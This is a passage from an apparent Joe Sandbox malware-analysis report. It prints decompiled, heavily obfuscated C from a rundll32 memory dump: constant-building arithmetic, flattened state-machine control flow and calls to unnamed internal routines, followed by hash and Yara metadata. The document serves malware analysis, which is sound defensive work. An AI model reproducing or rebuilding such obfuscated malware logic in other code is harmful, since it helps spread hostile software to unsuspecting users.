                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _t404;
                                                                                                                      				signed int _t421;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				signed int _t424;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t430;
                                                                                                                      				void* _t463;
                                                                                                                      				void* _t464;
                                                                                                                      				signed int* _t468;
                                                                                                                      
                                                                                                                      				_t468 =  &_v2776;
                                                                                                                      				_v2716 = 0x9827f0;
                                                                                                                      				_v2716 = _v2716 << 9;
                                                                                                                      				_v2716 = _v2716 >> 4;
                                                                                                                      				_v2716 = _v2716 ^ 0x0304fe29;
                                                                                                                      				_v2684 = 0x251356;
                                                                                                                      				_v2684 = _v2684 + 0x1e2;
                                                                                                                      				_v2684 = _v2684 | 0xda75bfb2;
                                                                                                                      				_v2684 = _v2684 ^ 0xda7428eb;
                                                                                                                      				_v2768 = 0x24e368;
                                                                                                                      				_v2768 = _v2768 ^ 0xd5a17b15;
                                                                                                                      				_v2768 = _v2768 << 7;
                                                                                                                      				_v2768 = _v2768 | 0xced33043;
                                                                                                                      				_v2768 = _v2768 ^ 0xced6ff80;
                                                                                                                      				_v2736 = 0xa2f196;
                                                                                                                      				_v2736 = _v2736 + 0x6d02;
                                                                                                                      				_v2736 = _v2736 << 8;
                                                                                                                      				_v2736 = _v2736 * 0x63;
                                                                                                                      				_t463 = __ecx;
                                                                                                                      				_v2736 = _v2736 ^ 0x2d971c6c;
                                                                                                                      				_t464 = 0x422d362;
                                                                                                                      				_v2760 = 0x391c44;
                                                                                                                      				_v2760 = _v2760 >> 0x10;
                                                                                                                      				_v2760 = _v2760 + 0xe88b;
                                                                                                                      				_v2760 = _v2760 + 0x506d;
                                                                                                                      				_v2760 = _v2760 ^ 0x00052d5d;
                                                                                                                      				_v2744 = 0x960a81;
                                                                                                                      				_t421 = 3;
                                                                                                                      				_v2744 = _v2744 * 0x47;
                                                                                                                      				_v2744 = _v2744 * 0x66;
                                                                                                                      				_v2744 = _v2744 + 0x35e4;
                                                                                                                      				_v2744 = _v2744 ^ 0x94845397;
                                                                                                                      				_v2604 = 0xe8b0f5;
                                                                                                                      				_v2604 = _v2604 + 0x9847;
                                                                                                                      				_v2604 = _v2604 ^ 0x00e1425b;
                                                                                                                      				_v2712 = 0x9aefe1;
                                                                                                                      				_v2712 = _v2712 + 0x2d7a;
                                                                                                                      				_v2712 = _v2712 | 0x79d44310;
                                                                                                                      				_v2712 = _v2712 ^ 0x79db8805;
                                                                                                                      				_v2728 = 0x1377c5;
                                                                                                                      				_v2728 = _v2728 | 0x6e97ff53;
                                                                                                                      				_v2728 = _v2728 + 0x22de;
                                                                                                                      				_v2728 = _v2728 ^ 0x6e9b6172;
                                                                                                                      				_v2752 = 0xb1335e;
                                                                                                                      				_v2752 = _v2752 ^ 0x2dbaf336;
                                                                                                                      				_v2752 = _v2752 / _t421;
                                                                                                                      				_v2752 = _v2752 ^ 0xfe92c193;
                                                                                                                      				_v2752 = _v2752 ^ 0xf19577cc;
                                                                                                                      				_v2660 = 0x2952e4;
                                                                                                                      				_v2660 = _v2660 | 0x79708fb3;
                                                                                                                      				_v2660 = _v2660 ^ 0x797ec65d;
                                                                                                                      				_v2680 = 0x48d1a6;
                                                                                                                      				_t422 = 0x34;
                                                                                                                      				_v2680 = _v2680 / _t422;
                                                                                                                      				_v2680 = _v2680 * 0x69;
                                                                                                                      				_v2680 = _v2680 ^ 0x0099bc36;
                                                                                                                      				_v2612 = 0xcdd72a;
                                                                                                                      				_v2612 = _v2612 * 0x50;
                                                                                                                      				_v2612 = _v2612 ^ 0x4054338c;
                                                                                                                      				_v2672 = 0x8e3222;
                                                                                                                      				_v2672 = _v2672 << 1;
                                                                                                                      				_v2672 = _v2672 ^ 0x0115b014;
                                                                                                                      				_v2772 = 0xea36ba;
                                                                                                                      				_v2772 = _v2772 + 0xffff2869;
                                                                                                                      				_v2772 = _v2772 >> 2;
                                                                                                                      				_v2772 = _v2772 ^ 0xcd7b9291;
                                                                                                                      				_v2772 = _v2772 ^ 0xcd4b3afc;
                                                                                                                      				_v2776 = 0x8f99fe;
                                                                                                                      				_v2776 = _v2776 + 0x5190;
                                                                                                                      				_v2776 = _v2776 + 0xffffc7d6;
                                                                                                                      				_v2776 = _v2776 ^ 0x0f761f96;
                                                                                                                      				_v2776 = _v2776 ^ 0x0ff50908;
                                                                                                                      				_v2652 = 0xb833cd;
                                                                                                                      				_t423 = 0x31;
                                                                                                                      				_v2652 = _v2652 * 0x75;
                                                                                                                      				_v2652 = _v2652 ^ 0x5422af3f;
                                                                                                                      				_v2620 = 0x8c6cc6;
                                                                                                                      				_v2620 = _v2620 + 0xffff9da6;
                                                                                                                      				_v2620 = _v2620 ^ 0x008df9f5;
                                                                                                                      				_v2688 = 0x40b504;
                                                                                                                      				_v2688 = _v2688 ^ 0xc3e337a5;
                                                                                                                      				_v2688 = _v2688 + 0x808c;
                                                                                                                      				_v2688 = _v2688 ^ 0xc3a77743;
                                                                                                                      				_v2704 = 0x4030d0;
                                                                                                                      				_v2704 = _v2704 | 0xd8d5f091;
                                                                                                                      				_v2704 = _v2704 ^ 0xb4a4ac2b;
                                                                                                                      				_v2704 = _v2704 ^ 0x6c7bdbfc;
                                                                                                                      				_v2644 = 0xafd4ef;
                                                                                                                      				_v2644 = _v2644 * 0x3b;
                                                                                                                      				_v2644 = _v2644 ^ 0x288fb790;
                                                                                                                      				_v2764 = 0x1d91e2;
                                                                                                                      				_v2764 = _v2764 | 0xd96eda72;
                                                                                                                      				_v2764 = _v2764 + 0xffffbbe3;
                                                                                                                      				_v2764 = _v2764 >> 0xc;
                                                                                                                      				_v2764 = _v2764 ^ 0x000d90f8;
                                                                                                                      				_v2696 = 0x4b7a41;
                                                                                                                      				_v2696 = _v2696 | 0xbfeeeeed;
                                                                                                                      				_v2696 = _v2696 ^ 0xbfe32e95;
                                                                                                                      				_v2708 = 0x8f6339;
                                                                                                                      				_v2708 = _v2708 | 0xa71a0417;
                                                                                                                      				_v2708 = _v2708 + 0xffff51d8;
                                                                                                                      				_v2708 = _v2708 ^ 0xa79b9aa8;
                                                                                                                      				_v2636 = 0x12e7d6;
                                                                                                                      				_v2636 = _v2636 * 0x21;
                                                                                                                      				_v2636 = _v2636 ^ 0x026e6de9;
                                                                                                                      				_v2756 = 0xd5c5d;
                                                                                                                      				_v2756 = _v2756 ^ 0x716456fc;
                                                                                                                      				_v2756 = _v2756 + 0xa334;
                                                                                                                      				_v2756 = _v2756 >> 0xc;
                                                                                                                      				_v2756 = _v2756 ^ 0x000918e1;
                                                                                                                      				_v2608 = 0xbb78a7;
                                                                                                                      				_v2608 = _v2608 + 0xd6b3;
                                                                                                                      				_v2608 = _v2608 ^ 0x00b2dabe;
                                                                                                                      				_v2668 = 0xad3636;
                                                                                                                      				_v2668 = _v2668 + 0xffffa01e;
                                                                                                                      				_v2668 = _v2668 ^ 0x00a02f3e;
                                                                                                                      				_v2628 = 0x4494fc;
                                                                                                                      				_v2628 = _v2628 / _t423;
                                                                                                                      				_v2628 = _v2628 ^ 0x0009fca5;
                                                                                                                      				_v2748 = 0x660e04;
                                                                                                                      				_v2748 = _v2748 + 0xffffa723;
                                                                                                                      				_v2748 = _v2748 | 0x67469fe4;
                                                                                                                      				_t424 = 0x4b;
                                                                                                                      				_v2748 = _v2748 * 5;
                                                                                                                      				_v2748 = _v2748 ^ 0x050bc0b3;
                                                                                                                      				_v2616 = 0xd4c89d;
                                                                                                                      				_v2616 = _v2616 << 7;
                                                                                                                      				_v2616 = _v2616 ^ 0x6a6fac0f;
                                                                                                                      				_v2700 = 0xaa08c8;
                                                                                                                      				_v2700 = _v2700 + 0xffffd108;
                                                                                                                      				_v2700 = _v2700 / _t424;
                                                                                                                      				_v2700 = _v2700 ^ 0x0001fda8;
                                                                                                                      				_v2732 = 0x67cb1c;
                                                                                                                      				_v2732 = _v2732 << 5;
                                                                                                                      				_v2732 = _v2732 | 0x2b3c2ffa;
                                                                                                                      				_v2732 = _v2732 ^ 0x295e7aa1;
                                                                                                                      				_v2732 = _v2732 ^ 0x06a01d44;
                                                                                                                      				_v2656 = 0xfaf065;
                                                                                                                      				_v2656 = _v2656 + 0xffff35fd;
                                                                                                                      				_v2656 = _v2656 ^ 0x00f58676;
                                                                                                                      				_v2740 = 0x2bd94;
                                                                                                                      				_v2740 = _v2740 + 0x3f47;
                                                                                                                      				_t425 = 0x2a;
                                                                                                                      				_v2740 = _v2740 / _t425;
                                                                                                                      				_v2740 = _v2740 ^ 0xca3749d7;
                                                                                                                      				_v2740 = _v2740 ^ 0xca3fc9be;
                                                                                                                      				_v2664 = 0x3942c4;
                                                                                                                      				_v2664 = _v2664 << 0xe;
                                                                                                                      				_v2664 = _v2664 ^ 0x50bf8d15;
                                                                                                                      				_v2724 = 0xb2ae33;
                                                                                                                      				_t426 = 0x22;
                                                                                                                      				_v2724 = _v2724 / _t426;
                                                                                                                      				_v2724 = _v2724 << 1;
                                                                                                                      				_v2724 = _v2724 ^ 0x6c628229;
                                                                                                                      				_v2724 = _v2724 ^ 0x6c6ae222;
                                                                                                                      				_v2640 = 0xd32362;
                                                                                                                      				_v2640 = _v2640 + 0xffff88f4;
                                                                                                                      				_v2640 = _v2640 ^ 0x00d4f71b;
                                                                                                                      				_v2648 = 0x3e5b4d;
                                                                                                                      				_v2648 = _v2648 + 0x4f8c;
                                                                                                                      				_v2648 = _v2648 ^ 0x003b681e;
                                                                                                                      				_v2676 = 0xc6bb8b;
                                                                                                                      				_v2676 = _v2676 << 4;
                                                                                                                      				_t427 = 0x14;
                                                                                                                      				_v2676 = _v2676 / _t427;
                                                                                                                      				_v2676 = _v2676 ^ 0x009ad4f5;
                                                                                                                      				_v2720 = 0xa3b34d;
                                                                                                                      				_v2720 = _v2720 + 0xffff97dd;
                                                                                                                      				_v2720 = _v2720 | 0x7136ebef;
                                                                                                                      				_v2720 = _v2720 ^ 0x71b8bb4e;
                                                                                                                      				_v2692 = 0xa7ff58;
                                                                                                                      				_t404 = _v2692 * 0x31;
                                                                                                                      				_v2692 = _t404;
                                                                                                                      				_v2692 = _v2692 >> 4;
                                                                                                                      				_v2692 = _v2692 ^ 0x020bdfc2;
                                                                                                                      				_v2624 = 0xa501ce;
                                                                                                                      				_v2624 = _v2624 | 0xdc20330f;
                                                                                                                      				_v2624 = _v2624 ^ 0xdca3e6f8;
                                                                                                                      				_v2632 = 0xa992b7;
                                                                                                                      				_v2632 = _v2632 | 0x4e4d69fe;
                                                                                                                      				_v2632 = _v2632 ^ 0x4ee71179;
                                                                                                                      				while(_t464 != 0x2953b22) {
                                                                                                                      					if(_t464 == 0x422d362) {
                                                                                                                      						_t464 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t475 = _t464 - 0xe704baa;
                                                                                                                      						if(_t464 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t464 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E001912A8(_t427, _v2684, _t475, _v2768, _v2736,  &_v2600);
                                                                                                                      							 *((short*)(E00184FA8(_v2760,  &_v2600, _v2744, _v2604))) = 0;
                                                                                                                      							E00178650(_v2712,  &_v1560, _t475, _v2728);
                                                                                                                      							_push(_v2612);
                                                                                                                      							_push(_v2680);
                                                                                                                      							_push(0x17181c);
                                                                                                                      							E0017E7CE(E0017AB66(_v2752, _v2660, _t475), _t475, _v2672,  &_v2600, _v2752, _v2772, _v2776, _v2652, _v2620,  &_v1560);
                                                                                                                      							E0017AE03(_v2688, _v2704, _v2644, _t415);
                                                                                                                      							_t427 = _v2764;
                                                                                                                      							_t404 = E0018C38F(_t427,  &_v2080, _t463, _v2696);
                                                                                                                      							_t468 =  &(_t468[0x15]);
                                                                                                                      							if(_t404 != 0) {
                                                                                                                      								_t464 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t404;
                                                                                                                      				}
                                                                                                                      				_push(_t427);
                                                                                                                      				E0017EA7B( &_v1040, _v2708, _v2716, _t427, _v2636, _v2756, _v2608);
                                                                                                                      				_push(_v2616);
                                                                                                                      				_push(_v2748);
                                                                                                                      				_push(0x1718cc);
                                                                                                                      				E0017E7CE(E0017AB66(_v2668, _v2628, __eflags), __eflags, _v2700,  &_v1040, _v2668, _v2732, _v2656, _v2740, _v2664,  &_v2080);
                                                                                                                      				_t430 = _v2724;
                                                                                                                      				E0017AE03(_t430, _v2640, _v2648, _t406);
                                                                                                                      				_push(_v2632);
                                                                                                                      				_push(_v2624);
                                                                                                                      				_push(_v2692);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2720);
                                                                                                                      				_push(_t430);
                                                                                                                      				_push(0);
                                                                                                                      				_t427 =  &_v520;
                                                                                                                      				_t404 = E00179700(_t427, _v2676, __eflags);
                                                                                                                      				_t468 =  &(_t468[0x1c]);
                                                                                                                      				_t464 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}
                                                                                                                      0x00178383
                                                                                                                      0x00178386
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AzK$G?$M[>$[B$]\$h$$mP$z-$R)$6q
                                                                                                                      • API String ID: 0-2334141070
                                                                                                                      • Opcode ID: bb38440e5dd0fb3af389ec01d410a3628ed05da2c69ea6f11f677433c680b813
                                                                                                                      • Instruction ID: b9d854ac7f37410e87e7a797c91806c8bd97c414a649f1b712587d794db631da
                                                                                                                      • Opcode Fuzzy Hash: bb38440e5dd0fb3af389ec01d410a3628ed05da2c69ea6f11f677433c680b813
                                                                                                                      • Instruction Fuzzy Hash: EC120F71508381DFD3A8CF21C58AA8BBBF1BBC5758F108A1DE2D996260D7B18949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E001874DD() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				char _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				unsigned int _v128;
                                                                                                                      				unsigned int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int* _t377;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int _t383;
                                                                                                                      				signed int* _t384;
                                                                                                                      				void* _t385;
                                                                                                                      				intOrPtr _t396;
                                                                                                                      				signed int _t398;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t400;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t402;
                                                                                                                      				signed int _t403;
                                                                                                                      				signed int _t404;
                                                                                                                      				signed int _t405;
                                                                                                                      				signed int _t406;
                                                                                                                      				signed int _t407;
                                                                                                                      				signed int _t408;
                                                                                                                      				void* _t409;
                                                                                                                      				signed int* _t410;
                                                                                                                      				signed int* _t444;
                                                                                                                      				void* _t452;
                                                                                                                      				signed int* _t456;
                                                                                                                      
                                                                                                                      				_t456 =  &_v152;
                                                                                                                      				_v8 = 0x511491;
                                                                                                                      				_t396 = 0;
                                                                                                                      				_t452 = 0x68b0bf3;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v108 = 0xf5425d;
                                                                                                                      				_t398 = 0x24;
                                                                                                                      				_v108 = _v108 / _t398;
                                                                                                                      				_v108 = _v108 | 0xbb3a7fab;
                                                                                                                      				_v108 = _v108 ^ 0xbb3effbb;
                                                                                                                      				_v132 = 0xf54152;
                                                                                                                      				_v132 = _v132 + 0x73b9;
                                                                                                                      				_v132 = _v132 | 0x673a86bd;
                                                                                                                      				_v132 = _v132 >> 4;
                                                                                                                      				_v132 = _v132 ^ 0x067ffb7b;
                                                                                                                      				_v36 = 0x17d741;
                                                                                                                      				_v36 = _v36 << 0xe;
                                                                                                                      				_v36 = _v36 ^ 0xf5d04000;
                                                                                                                      				_v72 = 0xb99ed8;
                                                                                                                      				_t399 = 0x74;
                                                                                                                      				_v72 = _v72 * 0x57;
                                                                                                                      				_v72 = _v72 ^ 0x28cb8c28;
                                                                                                                      				_v72 = _v72 ^ 0x17df7740;
                                                                                                                      				_v100 = 0xb82182;
                                                                                                                      				_v100 = _v100 >> 2;
                                                                                                                      				_v100 = _v100 | 0xc07135d2;
                                                                                                                      				_v100 = _v100 ^ 0xc07f3df2;
                                                                                                                      				_v120 = 0x71fefc;
                                                                                                                      				_v120 = _v120 ^ 0x3c3b57cf;
                                                                                                                      				_v120 = _v120 ^ 0xde073c70;
                                                                                                                      				_v120 = _v120 + 0xffffefcb;
                                                                                                                      				_v120 = _v120 ^ 0xe24618f4;
                                                                                                                      				_v128 = 0x9b3c32;
                                                                                                                      				_v128 = _v128 >> 0xb;
                                                                                                                      				_v128 = _v128 ^ 0x48395a77;
                                                                                                                      				_v128 = _v128 >> 0xf;
                                                                                                                      				_v128 = _v128 ^ 0x000e9da5;
                                                                                                                      				_v136 = 0x52cc3f;
                                                                                                                      				_v136 = _v136 * 0x6b;
                                                                                                                      				_v136 = _v136 ^ 0x9c4f2321;
                                                                                                                      				_v136 = _v136 | 0xfd912896;
                                                                                                                      				_v136 = _v136 ^ 0xffd2684a;
                                                                                                                      				_v48 = 0x5298d7;
                                                                                                                      				_v48 = _v48 ^ 0x46ea6646;
                                                                                                                      				_v48 = _v48 ^ 0x46b0922b;
                                                                                                                      				_v112 = 0xeb4fde;
                                                                                                                      				_v112 = _v112 / _t399;
                                                                                                                      				_v112 = _v112 >> 0xc;
                                                                                                                      				_t400 = 0x56;
                                                                                                                      				_v112 = _v112 / _t400;
                                                                                                                      				_v112 = _v112 ^ 0x0003a7ac;
                                                                                                                      				_v52 = 0x2cac0;
                                                                                                                      				_v52 = _v52 + 0x2e2d;
                                                                                                                      				_v52 = _v52 ^ 0x00080243;
                                                                                                                      				_v124 = 0x3dbea4;
                                                                                                                      				_v124 = _v124 + 0x560a;
                                                                                                                      				_v124 = _v124 >> 0x10;
                                                                                                                      				_v124 = _v124 >> 9;
                                                                                                                      				_v124 = _v124 ^ 0x00027af4;
                                                                                                                      				_v56 = 0x4e9164;
                                                                                                                      				_v56 = _v56 >> 0xd;
                                                                                                                      				_v56 = _v56 ^ 0x00077014;
                                                                                                                      				_v28 = 0x1ac9f;
                                                                                                                      				_v28 = _v28 << 7;
                                                                                                                      				_v28 = _v28 ^ 0x00d40977;
                                                                                                                      				_v148 = 0xc87974;
                                                                                                                      				_t401 = 0xf;
                                                                                                                      				_v148 = _v148 / _t401;
                                                                                                                      				_v148 = _v148 + 0x3bc4;
                                                                                                                      				_v148 = _v148 >> 2;
                                                                                                                      				_v148 = _v148 ^ 0x0004ff8e;
                                                                                                                      				_v140 = 0x51bf99;
                                                                                                                      				_v140 = _v140 + 0x1f0d;
                                                                                                                      				_v140 = _v140 | 0x6ce4c515;
                                                                                                                      				_v140 = _v140 << 7;
                                                                                                                      				_v140 = _v140 ^ 0x7aef3c21;
                                                                                                                      				_v64 = 0x9041a6;
                                                                                                                      				_v64 = _v64 | 0xf9fd38a0;
                                                                                                                      				_v64 = _v64 + 0x56fc;
                                                                                                                      				_v64 = _v64 ^ 0xf9f31663;
                                                                                                                      				_v96 = 0xb1a19;
                                                                                                                      				_v96 = _v96 + 0x5234;
                                                                                                                      				_t402 = 0x68;
                                                                                                                      				_v96 = _v96 * 0x32;
                                                                                                                      				_v96 = _v96 ^ 0x0237c494;
                                                                                                                      				_v152 = 0x354a37;
                                                                                                                      				_v152 = _v152 | 0x37184972;
                                                                                                                      				_v152 = _v152 ^ 0x144b30cb;
                                                                                                                      				_v152 = _v152 * 0x1f;
                                                                                                                      				_v152 = _v152 ^ 0x4b54d1c6;
                                                                                                                      				_v116 = 0xf3726e;
                                                                                                                      				_v116 = _v116 + 0xcc69;
                                                                                                                      				_v116 = _v116 >> 3;
                                                                                                                      				_v116 = _v116 + 0x674b;
                                                                                                                      				_v116 = _v116 ^ 0x001624aa;
                                                                                                                      				_v44 = 0x3b88ac;
                                                                                                                      				_v44 = _v44 / _t402;
                                                                                                                      				_v44 = _v44 ^ 0x00096110;
                                                                                                                      				_v20 = 0x83fd7f;
                                                                                                                      				_v20 = _v20 ^ 0x5c57be60;
                                                                                                                      				_v20 = _v20 ^ 0x5cd84720;
                                                                                                                      				_v144 = 0x80ab55;
                                                                                                                      				_t403 = 0x46;
                                                                                                                      				_v144 = _v144 / _t403;
                                                                                                                      				_v144 = _v144 + 0xffffcaef;
                                                                                                                      				_v144 = _v144 + 0xffff67c3;
                                                                                                                      				_v144 = _v144 ^ 0x00052ea0;
                                                                                                                      				_v16 = 0xeb356a;
                                                                                                                      				_t199 =  &_v16; // 0xeb356a
                                                                                                                      				_t404 = 0x65;
                                                                                                                      				_v16 =  *_t199 / _t404;
                                                                                                                      				_v16 = _v16 ^ 0x000ce393;
                                                                                                                      				_v88 = 0xe75d2;
                                                                                                                      				_v88 = _v88 + 0xe1a2;
                                                                                                                      				_v88 = _v88 ^ 0xbfa107b7;
                                                                                                                      				_v88 = _v88 ^ 0xbfa92cf6;
                                                                                                                      				_v40 = 0xb57020;
                                                                                                                      				_t405 = 0x18;
                                                                                                                      				_v40 = _v40 / _t405;
                                                                                                                      				_v40 = _v40 ^ 0x000d9612;
                                                                                                                      				_v80 = 0xaa39d6;
                                                                                                                      				_t406 = 0x4c;
                                                                                                                      				_v80 = _v80 / _t406;
                                                                                                                      				_t407 = 0x4f;
                                                                                                                      				_v80 = _v80 / _t407;
                                                                                                                      				_v80 = _v80 ^ 0x000dd886;
                                                                                                                      				_v84 = 0x7565b2;
                                                                                                                      				_v84 = _v84 ^ 0x85e60cd2;
                                                                                                                      				_v84 = _v84 | 0xe2f126fa;
                                                                                                                      				_v84 = _v84 ^ 0xe7fbef1f;
                                                                                                                      				_v92 = 0x20921c;
                                                                                                                      				_v92 = _v92 << 0xf;
                                                                                                                      				_t408 = 0x3d;
                                                                                                                      				_v92 = _v92 / _t408;
                                                                                                                      				_v92 = _v92 ^ 0x0137fd8d;
                                                                                                                      				_v104 = 0x7d1988;
                                                                                                                      				_v104 = _v104 | 0x48f8c783;
                                                                                                                      				_v104 = _v104 * 0x2a;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0x0f9ace16;
                                                                                                                      				_v32 = 0xc6b5a4;
                                                                                                                      				_v32 = _v32 ^ 0x611852a0;
                                                                                                                      				_v32 = _v32 ^ 0x61d9018e;
                                                                                                                      				_v24 = 0x4e0063;
                                                                                                                      				_v24 = _v24 * 0x56;
                                                                                                                      				_v24 = _v24 ^ 0x1a371aa3;
                                                                                                                      				_v60 = 0xb39a6a;
                                                                                                                      				_v60 = _v60 + 0x379a;
                                                                                                                      				_v60 = _v60 << 0xb;
                                                                                                                      				_v60 = _v60 ^ 0x9e9cdd6f;
                                                                                                                      				_v68 = 0xe7ba26;
                                                                                                                      				_v68 = _v68 + 0xffffbb05;
                                                                                                                      				_v68 = _v68 ^ 0xbd703087;
                                                                                                                      				_v68 = _v68 ^ 0xbd98ca1c;
                                                                                                                      				_v76 = 0x8102f3;
                                                                                                                      				_v76 = _v76 << 6;
                                                                                                                      				_v76 = _v76 * 0x7c;
                                                                                                                      				_v76 = _v76 ^ 0x9f574684;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t444 =  *0x195c90; // 0x0
                                                                                                                      					_t373 = 0x882fd94;
                                                                                                                      					do {
                                                                                                                      						if(_t452 == 0x68b0bf3) {
                                                                                                                      							_push(_t408);
                                                                                                                      							_push(_t408);
                                                                                                                      							_t409 = 0x28;
                                                                                                                      							_t377 = E00183512(_t409);
                                                                                                                      							 *0x195c90 = _t377;
                                                                                                                      							_t377[3] = 0x4000;
                                                                                                                      							_t410 =  *0x195c90; // 0x0
                                                                                                                      							_t381 = E00183512(_t410[3]);
                                                                                                                      							_t444 =  *0x195c90; // 0x0
                                                                                                                      							_t452 = 0xf7a4d1a;
                                                                                                                      							_t408 = _t381;
                                                                                                                      							_t383 = _t444[3] + _t408;
                                                                                                                      							__eflags = _t383;
                                                                                                                      							_t444[2] = _t408;
                                                                                                                      							_t444[1] = _t408;
                                                                                                                      							 *_t444 = _t408;
                                                                                                                      							_t444[5] = _t383;
                                                                                                                      							L12:
                                                                                                                      							_t373 = 0x882fd94;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t452 == _t373) {
                                                                                                                      							_t384 =  *0x195c90; // 0x0
                                                                                                                      							_t408 = _v20;
                                                                                                                      							_t385 = E0017C795(_t408, _v144, _v36, _t384[3], _t384[2], _v12, _v16, _v88);
                                                                                                                      							_t456 =  &(_t456[6]);
                                                                                                                      							__eflags = _t385 - _v72;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t452 = 0xcb14d1c;
                                                                                                                      							} else {
                                                                                                                      								_t452 = 0xd2040d1;
                                                                                                                      								_t396 = 1;
                                                                                                                      							}
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						if(_t452 == 0xcb14d1c) {
                                                                                                                      							E001768DE(_v84, _v92, _v104, _v32, _t444[2]);
                                                                                                                      							E001768DE(_v24, _v60, _v68, _v76,  *0x195c90);
                                                                                                                      							L17:
                                                                                                                      							return _t396;
                                                                                                                      						}
                                                                                                                      						if(_t452 == 0xd2040d1) {
                                                                                                                      							E00177027(_v40, _v100, _v12, _v80);
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						_t463 = _t452 - 0xf7a4d1a;
                                                                                                                      						if(_t452 != 0xf7a4d1a) {
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_push(_v148);
                                                                                                                      						_push(_v28);
                                                                                                                      						_push(0x171324);
                                                                                                                      						E00180EDA(0, _v108, _v140, E0017AB66(_v124, _v56, _t463),  &_v12, _v64, _v96);
                                                                                                                      						_t408 = _v152;
                                                                                                                      						_t452 =  ==  ? 0x882fd94 : 0xcb14d1c;
                                                                                                                      						E0017AE03(_t408, _v116, _v44, _t390);
                                                                                                                      						_t444 =  *0x195c90; // 0x0
                                                                                                                      						_t456 =  &(_t456[0xa]);
                                                                                                                      						goto L12;
                                                                                                                      						L13:
                                                                                                                      					} while (_t452 != 0xd072e76);
                                                                                                                      					goto L17;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x00187997
                                                                                                                      0x0018799f
                                                                                                                      0x001879a4
                                                                                                                      0x001879ac
                                                                                                                      0x001879b4
                                                                                                                      0x001879bc
                                                                                                                      0x001879c4
                                                                                                                      0x001879cc
                                                                                                                      0x001879d4
                                                                                                                      0x001879de
                                                                                                                      0x001879e2
